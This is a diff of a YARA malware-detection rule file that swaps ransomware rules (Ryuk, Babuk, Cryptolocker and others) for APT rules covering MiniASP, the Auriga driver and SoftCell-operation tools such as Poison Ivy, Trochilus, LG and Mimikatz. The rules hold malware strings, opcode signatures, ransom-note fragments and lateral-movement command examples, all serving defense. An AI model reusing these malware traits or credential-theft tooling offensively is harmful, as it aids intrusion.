-		$sq4 = { f9 f7c70012355f 35c01f5226 f9 8d8056c800b0 f6c4b2 f9 }
-		$sq5 = { f5 f9 44 3aeb 45 33cd 41 }
-		$sq6 = { 890f c0ff12 44 b4a3 ee 2b4e70 7361 }
-		$sq7 = { 81c502000000 6689542500 6681d97a1e 660fabe1 660fbae1a5 8b0f 8dbf04000000 }
-		$sq8 = { 8d13 de11 d7 677846 f1 0d8cd45f87 bb34b98f33 }
-		$sq9 = { 1440 4b 41 e8???????? 397c0847 }
+		$pdb = "\\Projects\\Jimmy\\jimmydll_v2.0\\JimmyForClan\\Jimmy\\bin\\srelease\\jimmydll\\indsvc32.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 21000KB and 7 of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and any of them
 }
-rule TRELLIX_ARC_Cryptolocker_Set1 : RANSOMWARE
+rule TRELLIX_ARC_Apt_Miniasp_Pdb : TROJAN FILE
 {
 	meta:
-		description = "Detection of Cryptolocker Samples"
-		author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
-		id = "13ccc6d3-c2cc-59ac-81af-ec11fb78cd41"
-		date = "2014-04-13"
+		description = "Rule to detect MiniASP based on PDB"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "2e7e2990-5e7f-52b0-884a-fcb54b2f5488"
+		date = "2012-07-12"
 		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Cryptolocker.yar#L1-L40"
+		reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_MiniASP_pdb.yar#L1-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "5be8d077537a59d860a972392be186d2697e55778f750d03b0fd3b0a73f714d9"
+		hash = "42334f2119069b8c0ececfb14a7030e480b5d18ca1cc35f1ceaee847bc040e53"
+		logic_hash = "8ee6f93aaae2c48cc5835269fd526371040cd33cc309220f92a150444ba21055"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE"
+		tags = "TROJAN, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Cryptolocker"
-		actor_type = "Cybercrime"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/MiniASP"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$string0 = "static"
-		$string1 = " kscdS"
-		$string2 = "Romantic"
-		$string3 = "CompanyName" wide
-		$string4 = "ProductVersion" wide
-		$string5 = "9%9R9f9q9"
-		$string6 = "IDR_VERSION1" wide
-		$string7 = "  </trustInfo>"
-		$string8 = "LookFor" wide
-		$string9 = ":n;t;y;"
-		$string10 = "        <requestedExecutionLevel level"
-		$string11 = "VS_VERSION_INFO" wide
-		$string12 = "2.0.1.0" wide
-		$string13 = "<assembly xmlns"
-		$string14 = "  <trustInfo xmlns"
-		$string15 = "srtWd@@"
-		$string16 = "515]5z5"
-		$string17 = "C:\\lZbvnoVe.exe" wide
+		$pdb = "\\Project\\mm\\Wininet\\Attack\\MiniAsp4\\Release\\MiniAsp.pdb"
+		$pdb1 = "\\XiaoME\\AiH\\20120410\\Attack\\MiniAsp3\\Release\\MiniAsp.pdb"
 
 	condition:
-		12 of ( $string* )
+		uint16( 0 ) == 0x5a4d and filesize < 80KB and any of them
 }
-rule TRELLIX_ARC_Cryptolocker_Rule2 : RANSOMWARE
+rule TRELLIX_ARC_Apt_Auriga_Driver : KERNELDRIVER FILE
 {
 	meta:
-		description = "Detection of CryptoLocker Variants"
-		author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
-		id = "a6e808ef-4f60-5592-9440-69309784efb1"
-		date = "2014-04-14"
+		description = "Rule to detect the Auriga driver"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "b61058a1-1b48-5be1-ba2f-74a7c3d38825"
+		date = "2013-03-13"
 		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Cryptolocker.yar#L42-L79"
+		reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_auriga_biscuit.yar#L1-L39"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "e8e03516cc0b669000c8d6b443be7a5f7a8b904abba98fd3c7d4f038de6741ab"
+		hash = "207eee627a76449ac6d2ca43338d28087c8b184e7b7b50fdc60a11950c8283ec"
+		logic_hash = "c027073ba398fe89d418be67f0850c8d9e4d4c50a991c45b84cdb416497ccf1c"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE"
+		tags = "KERNELDRIVER, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Cryptolocker"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
+		malware_type = "kerneldriver"
+		malware_family = "Driver:W32/Auriga"
+		actor_type = "APT"
+		actor_group = "APT1"
 
 	strings:
-		$string0 = "2.0.1.7" wide
-		$string1 = "    <security>"
-		$string2 = "Romantic"
-		$string3 = "ProductVersion" wide
-		$string4 = "9%9R9f9q9"
-		$string5 = "IDR_VERSION1" wide
-		$string6 = "button"
-		$string7 = "    </security>"
-		$string8 = "VFileInfo" wide
-		$string9 = "LookFor" wide
-		$string10 = "      </requestedPrivileges>"
-		$string11 = " uiAccess"
-		$string12 = "  <trustInfo xmlns"
-		$string13 = "last.inf"
-		$string14 = " manifestVersion"
-		$string15 = "FFFF04E3" wide
-		$string16 = "3,31363H3P3m3u3z3"
+		$s1 = "\\SystemRoot\\System32\\netui.dll" fullword wide
+		$s2 = "\\SystemRoot\\System32\\drivers\\riodrv32.sys" fullword wide
+		$s3 = "\\SystemRoot\\System32\\arp.exe" fullword wide
+		$s4 = "netui.dll" fullword ascii
+		$s5 = "riodrv32.sys" fullword wide
+		$s6 = "\\netui.dll" fullword wide
+		$s7 = "d:\\drizt\\projects\\auriga\\branches\\stone_~1\\server\\exe\\i386\\riodrv32.pdb" fullword ascii
+		$s8 = "\\riodrv32.sys" fullword wide
+		$s9 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\riodrv32" fullword wide
+		$s10 = "\\DosDevices\\rio32drv" fullword wide
+		$s11 = "e\\Driver\\nsiproxy" fullword wide
+		$s12 = "(C) S3/Diamond Multimedia Systems. All rights reserved." fullword wide
+		$s13 = "\\Device\\rio32drv" fullword wide
+		$s14 = "\\Registry\\Machine\\SOFTWARE\\riodrv" fullword wide
+		$s15 = "\\Registry\\Machine\\SOFTWARE\\riodrv32" fullword wide
 
 	condition:
-		12 of ( $string* )
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
 }
-rule TRELLIX_ARC_Snake_Ransomware : RANSOMWARE FILE
+
+rule TRELLIX_ARC_Shadowspawn_Utility : UTILITY FILE
 {
 	meta:
-		description = "Rule to detect Snake ransomware"
-		author = "McAfee ATR Team"
-		id = "b8f50af5-5568-5676-93a1-e818f08df0ce"
-		date = "2020-02-20"
-		modified = "2020-10-12"
-		reference = "https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_snake_ransomware.yar#L1-L26"
+		description = "Rule to detect ShadowSpawn utility used in the SoftCell operation"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "0a325f5c-2750-5354-b920-f7e1510a8b71"
+		date = "2019-06-25"
+		modified = "2020-08-14"
+		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L3-L32"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60"
-		logic_hash = "3ae64fbacbf886b8d09abc3f5f8eb9c8bff809909a251f2d055056e6d12217a2"
+		logic_hash = "0f2805aee60cdb4eb932768849c845052c92131d0b25a511b822b79b2ac93e24"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "UTILITY, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/EKANS"
-		actor_type = "Cybercrime"
+		malware_type = "utility"
+		malware_family = "Trojan:W32/ShadowSpawn"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$snake = { 43 3A 2F 55 73 ?? 72 ?? 2F 57 49 4E 31 2F 67 6F 2F 73 ?? 63 2F 6A 6F 62 6E 68 62 67 6E 6E 69 66 70 6F 64 68 68 70 ?? 6D 66 2F 6E 66 64 6C 68 6F 70 68 6B 65 69 6A 61 64 67 66 64 64 69 6D 2F 6E 66 64 6C 68 6F 70 68 6B 65 69 6A 61 64 67 66 64 64 69 6D 2F 76 74 5F 73 74 ?? 69 6E 67 2E 67 6F 00 }
+		$pdb = "C:\\data\\projects\\shadowspawn\\src\\bin\\Release-W2K3\\x64\\ShadowSpawn.pdb" fullword ascii
+		$op0 = { e9 34 ea ff ff cc cc cc cc 48 8d 8a 20 }
+		$op1 = { 48 8b 85 e0 06 00 00 48 8d 34 00 48 8d 46 02 48 }
+		$op2 = { e9 34 c1 ff ff cc cc cc cc 48 8b 8a 68 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 11000KB ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "eaae87b11d2ebdd286af419682037b4c" and all of them )
 }
 
-rule TRELLIX_ARC_Megacortex_Signed : RANSOMWARE FILE
+rule TRELLIX_ARC_Poison_Ivy_Softcell : RAT FILE
 {
 	meta:
-		description = "Rule to detect MegaCortex samples digitally signed"
+		description = "Rule to detect Poison Ivy used in the SoftCell operation"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "78a74e30-4de0-5e63-8ca5-31251c296f98"
-		date = "2026-02-01"
+		id = "c362b116-4cb6-5393-9c64-28e8d2886dc7"
+		date = "2019-06-25"
 		modified = "2020-08-14"
-		reference = "https://blog.malwarebytes.com/detections/ransom-megacortex/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_MegaCortex.yar#L3-L26"
+		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L34-L72"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "8ffced3aca837682fbd7ee68f559f73b8299cbfbe198f48124c4857680735249"
+		logic_hash = "ac84023404d76adf8cfd8d26bb59fb51f29057748806c4f5ea0634803fd937cd"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/MegaCortex"
-		actor_type = "Cybercrime"
+		tags = "RAT, FILE"
+		rule_version = "v1"
+		malware_type = "rat"
+		malware_family = "Rat:W32/PoisonIvy"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
+	strings:
+		$s1 = "Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password." fullword wide
+		$s2 = "Extracting files to %s folder$Extracting files to temporary folder" fullword wide
+		$s3 = "&Enter password for the encrypted file:" fullword wide
+		$s4 = "start \"\" \"%CD%\\mcoemcpy.exe\"" fullword ascii
+		$s5 = "setup.bat" fullword ascii
+		$s6 = "ErroraErrors encountered while performing the operation" fullword wide
+		$s7 = "Please download a fresh copy and retry the installation" fullword wide
+		$s8 = "antivir.dat" fullword ascii
+		$s9 = "The required volume is absent2The archive is either in unknown format or damaged" fullword wide
+		$s10 = "=Total path and file name length must not exceed %d characters" fullword wide
+		$s11 = "Please close all applications, reboot Windows and restart this installation\\Some installation files are corrupt." fullword wide
+		$op0 = { e8 6f 12 00 00 84 c0 74 04 32 c0 eb 34 56 ff 75 }
+		$op1 = { 53 68 b0 34 41 00 57 e8 61 44 00 00 57 e8 31 44 }
+		$op2 = { 56 ff 75 08 8d b5 f4 ef ff ff e8 17 ff ff ff 8d }
+
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "/C=GB/L=ROMFORD/O=3AN LIMITED/CN=3AN LIMITED" and pe.signatures [ i ] . serial == "04:c7:cd:cc:16:98:e2:5b:49:3e:b4:33:8d:5e:2f:8b" or pe.signatures [ i ] . subject contains "/C=GB/postalCode=RM6 4DE/ST=ROMFORD/L=ROMFORD/street=8 Quarles Park Road/O=3AN LIMITED/CN=3AN LIMITED" and pe.signatures [ i ] . serial == "53:cc:4c:69:e5:6a:7d:bc:36:67:d5:ff:d5:24:aa:4b" or pe.signatures [ i ] . subject contains "/C=GB/postalCode=RM6 4DE/ST=ROMFORD/L=ROMFORD/street=8 Quarles Park Road/O=3AN LIMITED/CN=3AN LIMITED" or pe.signatures [ i ] . serial == "00:ad:72:9a:65:f1:78:47:ac:b8:f8:49:6a:76:80:ff:1e" )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "dbb1eb5c3476069287a73206929932fd" and all of them )
 }
-rule TRELLIX_ARC_Ryuk_Ransomware : RANSOMWARE FILE
+
+rule TRELLIX_ARC_Trochilus_Softcell : TROJAN FILE
 {
 	meta:
-		description = "Ryuk Ransomware hunting rule"
-		author = "Christiaan Beek - McAfee ATR team"
-		id = "d3e67e26-3b34-5c28-a1c0-c4aeacd49df9"
-		date = "2019-04-25"
-		modified = "2021-07-12"
-		reference = "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Ryuk.yar#L1-L47"
+		description = "Rule to detect Trochilus malware used in the SoftCell operation"
+		author = "Trellix ARC Team"
+		id = "81e942ae-936f-5952-8d50-ee8cec74520b"
+		date = "2019-06-25"
+		modified = "2020-08-14"
+		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L74-L106"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "43c0be708fa8a388dce6e1dd721e24329b5b08a942d99e9b2631c90155790c4b"
-		score = 50
+		logic_hash = "80a0841a08627acf11707f3aeef4e7c3777aecf04b932755efa618d7e92b0cda"
+		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v2"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Ryuk"
-		actor_type = "Cybercrime"
+		tags = "TROJAN, FILE"
+		rule_version = "v1"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/Trochilus"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$x1 = "C:\\Windows\\System32\\cmd.exe" fullword ascii
-		$x2 = "\\System32\\cmd.exe" fullword wide
-		$s1 = "C:\\Users\\Admin\\Documents\\Visual Studio 2015\\Projects\\ConsoleApplication54new crypted" ascii
-		$s2 = "fg4tgf4f3.dll" fullword wide
-		$s3 = "lsaas.exe" fullword wide
-		$s4 = "\\Documents and Settings\\Default User\\sys" fullword wide
-		$s5 = "\\Documents and Settings\\Default User\\finish" fullword wide
-		$s6 = "\\users\\Public\\sys" fullword wide
-		$s7 = "\\users\\Public\\finish" fullword wide
-		$s8 = "You will receive btc address for payment in the reply letter" fullword ascii
-		$s9 = "hrmlog" fullword wide
-		$s10 = "No system is safe" fullword ascii
-		$s11 = "keystorage2" fullword wide
-		$s12 = "klnagent" fullword wide
-		$s13 = "sqbcoreservice" fullword wide
-		$s14 = "tbirdconfig" fullword wide
-		$s15 = "taskkill" fullword wide
-		$op0 = { 8b 40 10 89 44 24 34 c7 84 24 c4 }
-		$op1 = { c7 44 24 34 00 40 00 00 c7 44 24 38 01 }
+		$s1 = "Shell.dll" fullword ascii
+		$s2 = "photo.dat" fullword wide
+		$s3 = "VW9HxtV9H|tQ9" fullword ascii
+		$s4 = "G6uEGRich7uEG" fullword ascii
+		$op0 = { e8 9d ad ff ff ff b6 a8 }
+		$op1 = { e8 d4 ad ff ff ff b6 94 }
+		$op2 = { e8 ea ad ff ff ff b6 8c }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "8e13ebc144667958722686cb04ee16f8" and ( pe.exports ( "Entry" ) and pe.exports ( "Main" ) ) and all of them )
 }
-rule TRELLIX_ARC_RANSOM_RYUK_May2021 : RANSOMWARE FILE
+
+rule TRELLIX_ARC_Lg_Utility_Lateral_Movement_Softcell : UTILITY FILE
 {
 	meta:
-		description = "Rule to detect latest May 2021 compiled Ryuk variant"
-		author = "Marc Elias | McAfee ATR Team"
-		id = "6e415a9e-7373-50a8-ad57-f95220faed9c"
-		date = "2021-05-21"
-		modified = "2021-07-12"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Ryuk.yar#L91-L113"
+		description = "Rule to detect the utility LG from Joeware to do Lateral Movement in the SoftCell operation"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "4f435348-427a-5f35-9545-5582033eb043"
+		date = "2019-06-25"
+		modified = "2020-08-14"
+		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L108-L143"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "8f368b029a3a5517cb133529274834585d087a2d3a5875d03ea38e5774019c8a"
-		logic_hash = "b379c1182e60ce8c777668386d8cbd08350dd2363770dec56502bf44aaf5d7f6"
-		score = 50
+		logic_hash = "f88781b9632cd31bb9e3d68730c63c3fcd0ebe4a09b70b5b54d456cdc9ae8d01"
+		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
-		version = "0.1"
+		tags = "UTILITY, FILE"
+		rule_version = "v1"
+		malware_type = "utility"
+		malware_family = "Utility:W32/Joeware"
+		actor_type = "Apt"
+		actor_group = "Unknown"
 
 	strings:
-		$ryuk_filemarker = "RYUKTM" fullword wide ascii
-		$sleep_constants = { 68 F0 49 02 00 FF (15|D1) [0-4] 68 ?? ?? ?? ?? 6A 01 }
-		$icmp_echo_constants = { 68 A4 06 00 00 6A 44 8D [1-6] 5? 6A 00 6A 20 [5-20] FF 15 }
+		$s1 = "lg \\\\comp1\\users louise -add -r comp3" fullword ascii
+		$s2 = "lg \\\\comp1\\users S-1-5-567-678-89765-456 -sid -add" fullword ascii
+		$s3 = "lg \\\\comp1\\users -sidsout" fullword ascii
+		$s4 = "Enumerates members of localgroup users on localhost" fullword ascii
+		$s5 = "Adds SID resolved at comp3 for louise to localgroup users on comp1" fullword ascii
+		$s6 = "CodeGear C++ - Copyright 2008 Embarcadero Technologies" fullword ascii
+		$s7 = "Lists members of localgroup users on comp1 in SID format" fullword ascii
+		$s8 = "ERROR: Verify that CSV lines are available in PIPE input. " fullword ascii
+		$op0 = { 89 43 24 c6 85 6f ff ff ff 00 83 7b 24 10 72 05 }
+		$op1 = { 68 f8 0e 43 00 e8 8d ff ff ff 83 c4 20 68 f8 0e }
+		$op2 = { 66 c7 85 74 ff ff ff 0c 00 8d 55 d8 52 e8 e9 eb }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 200KB and ( $ryuk_filemarker or ( $sleep_constants and $icmp_echo_constants ) )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "327ce3f883a5b59e966b5d0e3a321156" and all of them )
 }
 
-rule TRELLIX_ARC_Ransom_Avoslocker : FILE
+rule TRELLIX_ARC_Mangzamel_Softcell : TROJAN FILE
 {
 	meta:
-		description = "Rule to detect Avoslocker Ransomware"
-		author = "CB @ ATR"
-		id = "50f029c8-154e-583d-8264-8d86d01075f6"
-		date = "2021-07-22"
-		modified = "2021-07-22"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Avoslocker.yar#L3-L27"
+		description = "Rule to detect Mangzamel used in the SoftCell operation"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "b0473362-7e03-5127-aee5-b5a4f05bcc8e"
+		date = "2019-06-25"
+		modified = "2020-08-14"
+		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L145-L176"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "316aaab225797eedd62f9cfde1fdbd799a10441b3b15a8abc76141b57b36b1d3"
+		logic_hash = "3666c645943eb8469096b8093c74e4d819299d3ffc2b99e37a506d8ef09e90c4"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		Version = "v1"
-		DetectionName = "Ransom_Win_Avoslocker"
-		hash1 = "fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f"
-		hash2 = "43b7a60c0ef8b4af001f45a0c57410b7374b1d75a6811e0dfc86e4d60f503856"
+		tags = "TROJAN, FILE"
+		rule_version = "v1"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/Mangzamel"
+		actor_type = "Apt"
+		actor_group = "Unknown"
 
 	strings:
-		$v1 = "CryptImportPublicKeyInfo failed. error: %d" fullword ascii
-		$v2 = "CryptStringToBinary failed. Err: %d" fullword ascii
-		$v3 = "encrypting %ls failed" fullword wide
-		$v4 = "CryptDecodeObjectEx 1 failed. Err: %p" fullword ascii
-		$v5 = "operator co_await" fullword ascii
-		$v6 = "drive %s took %f seconds" fullword ascii
-		$seq0 = { 8d 4e 04 5e e9 b1 ff ff ff 55 8b ec ff 75 08 ff }
-		$seq1 = { 33 c0 80 fb 2d 0f 94 c0 05 ff ff ff 7f eb 02 f7 }
-		$seq2 = { 8b 40 0c 89 85 1c ff ff ff 8b 40 0c 89 85 18 ff }
+		$s1 = "Change Service Mode to user logon failure.code:%d" fullword ascii
+		$s2 = "spoolsvs.exe" fullword wide
+		$s3 = "System\\CurrentControlSet\\Services\\%s\\parameters\\%s" fullword ascii
+		$s4 = "Please Correct [-s %s]" fullword ascii
+		$s5 = "Please Correct [-m %s]" fullword ascii
+		$op0 = { 59 8d 85 64 ff ff ff 50 c7 85 64 ff ff ff 94 }
+		$op1 = { c9 c2 08 00 81 c1 30 34 00 00 e9 cf 9b ff ff 55 }
+		$op2 = { 80 0f b6 b5 68 ff ff ff c1 e2 04 0b d6 0f b6 b5 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and pe.imphash ( ) == "a24c2b5bf84a5465eb75f1e6aa8c1eec" and ( 5 of them ) and all of ( $seq* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "ef64bb4aa42ef5a8a2e3858a636bce40" and all of them )
 }
-rule TRELLIX_ARC_Jeff_Dev_Ransomware : RANSOMWARE FILE
+
+rule TRELLIX_ARC_Nbtscan_Utility_Softcell : UTILITY FILE
 {
 	meta:
-		description = "Rule to detect Jeff Dev Ransomware"
+		description = "Rule to detect nbtscan utility used in the SoftCell operation"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "dd5e24f4-a2d8-5db5-9e7e-7f8bded5d401"
-		date = "2018-08-26"
+		id = "a2a8dd43-0d30-5da5-9dd3-6ba9f6473c40"
+		date = "2019-06-25"
 		modified = "2020-08-14"
-		reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_jeff_dev.yar#L1-L28"
+		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L178-L209"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "386d4617046790f7f1fcf37505be4ffe51d165ba7cbd42324aed723288ca7e0a"
-		logic_hash = "58a408f4e1781540e4abdb87b85b94c1f0ea49b40bf241d6d074bc2162ac2032"
+		logic_hash = "6079f1363578f82fd38971d0c8f69cc156f7f678c3f2be22c5d9c3748dc80b1f"
 		score = 75
 		quality = 45
-		tags = "RANSOMWARE, FILE"
+		tags = "UTILITY, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Jeff"
-		actor_type = "Cybercrime"
+		malware_type = "utility"
+		malware_family = "Utility:W32/NbtScan"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "C:\\Users\\Umut\\Desktop\\takemeon" fullword wide
-		$s2 = "C:\\Users\\Umut\\Desktop\\" fullword ascii
-		$s3 = "PRESS HERE TO STOP THIS CREEPY SOUND AND VIEW WHAT HAPPENED TO YOUR COMPUTER" fullword wide
-		$s4 = "WHAT YOU DO TO MY COMPUTER??!??!!!" fullword wide
+		$s1 = "nbtscan 1.0.35 - 2008-04-08 - http://www.unixwiz.net/tools/" fullword ascii
+		$s2 = "parse_target_cb.c" fullword ascii
+		$s3 = "ranges. Ranges can be in /nbits notation (\"192.168.12.0/24\")" fullword ascii
+		$s4 = "or with a range in the last octet (\"192.168.12.64-97\")" fullword ascii
+		$op0 = { 52 68 d4 66 40 00 8b 85 58 ff ff ff 50 ff 15 a0 }
+		$op1 = { e9 1c ff ff ff 8b 45 fc 8b e5 5d c3 cc cc cc cc }
+		$op2 = { 59 59 c3 8b 65 e8 ff 75 d0 ff 15 34 60 40 00 ff }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 5000KB ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "2fa43c5392ec7923ababced078c2f98d" and all of them )
 }
-rule TRELLIX_ARC_Ransom_Babuk : RANSOM T1027 T1083 T1057 T1082 T1129 T1490 T1543_003 FILE
+
+rule TRELLIX_ARC_Mimikatz_Utility_Softcell : HACKTOOL FILE
 {
 	meta:
-		description = "Rule to detect Babuk Locker"
-		author = "TS @ McAfee ATR"
-		id = "7c0a3b4e-90aa-5442-aa5e-1a7fcae9bec8"
-		date = "2021-01-19"
-		modified = "2021-02-24"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_BabukLocker_Jan2021.yar#L1-L25"
+		description = "Rule to detect Mimikatz utility used in the SoftCell operation"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "0c01a2f6-cf3c-57b3-8f19-94d320422658"
+		date = "2019-06-25"
+		modified = "2020-08-14"
+		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L211-L258"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "e10713a4a5f635767dcd54d609bed977"
-		logic_hash = "123cebd1c2e66f3e91ee235cb9288df63dfaeba02e6df45f896cb50f38851a8f"
+		logic_hash = "4ccb44bf0d490a18e35290d904326ce14cdc92c96be1a38e6059431645233e37"
 		score = 75
-		quality = 70
-		tags = "RANSOM, T1027, T1083, T1057, T1082, T1129, T1490, T1543.003, FILE"
-		rule_version = "v2"
